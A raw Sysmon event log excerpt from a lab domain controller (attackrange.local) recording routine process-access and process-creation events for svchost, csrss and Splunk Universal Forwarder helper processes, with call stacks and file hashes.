13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-449A-6000-1D01-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-449A-6000-1D01-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.443{08A6967A-449A-6000-1D01-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.255{08A6967A-449B-6000-1E01-000000009A01}7483692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-449B-6000-1E01-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-449B-6000-1E01-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.099{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-449B-6000-1E01-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:19.100{08A6967A-449B-6000-1E01-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-449C-6000-1F01-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 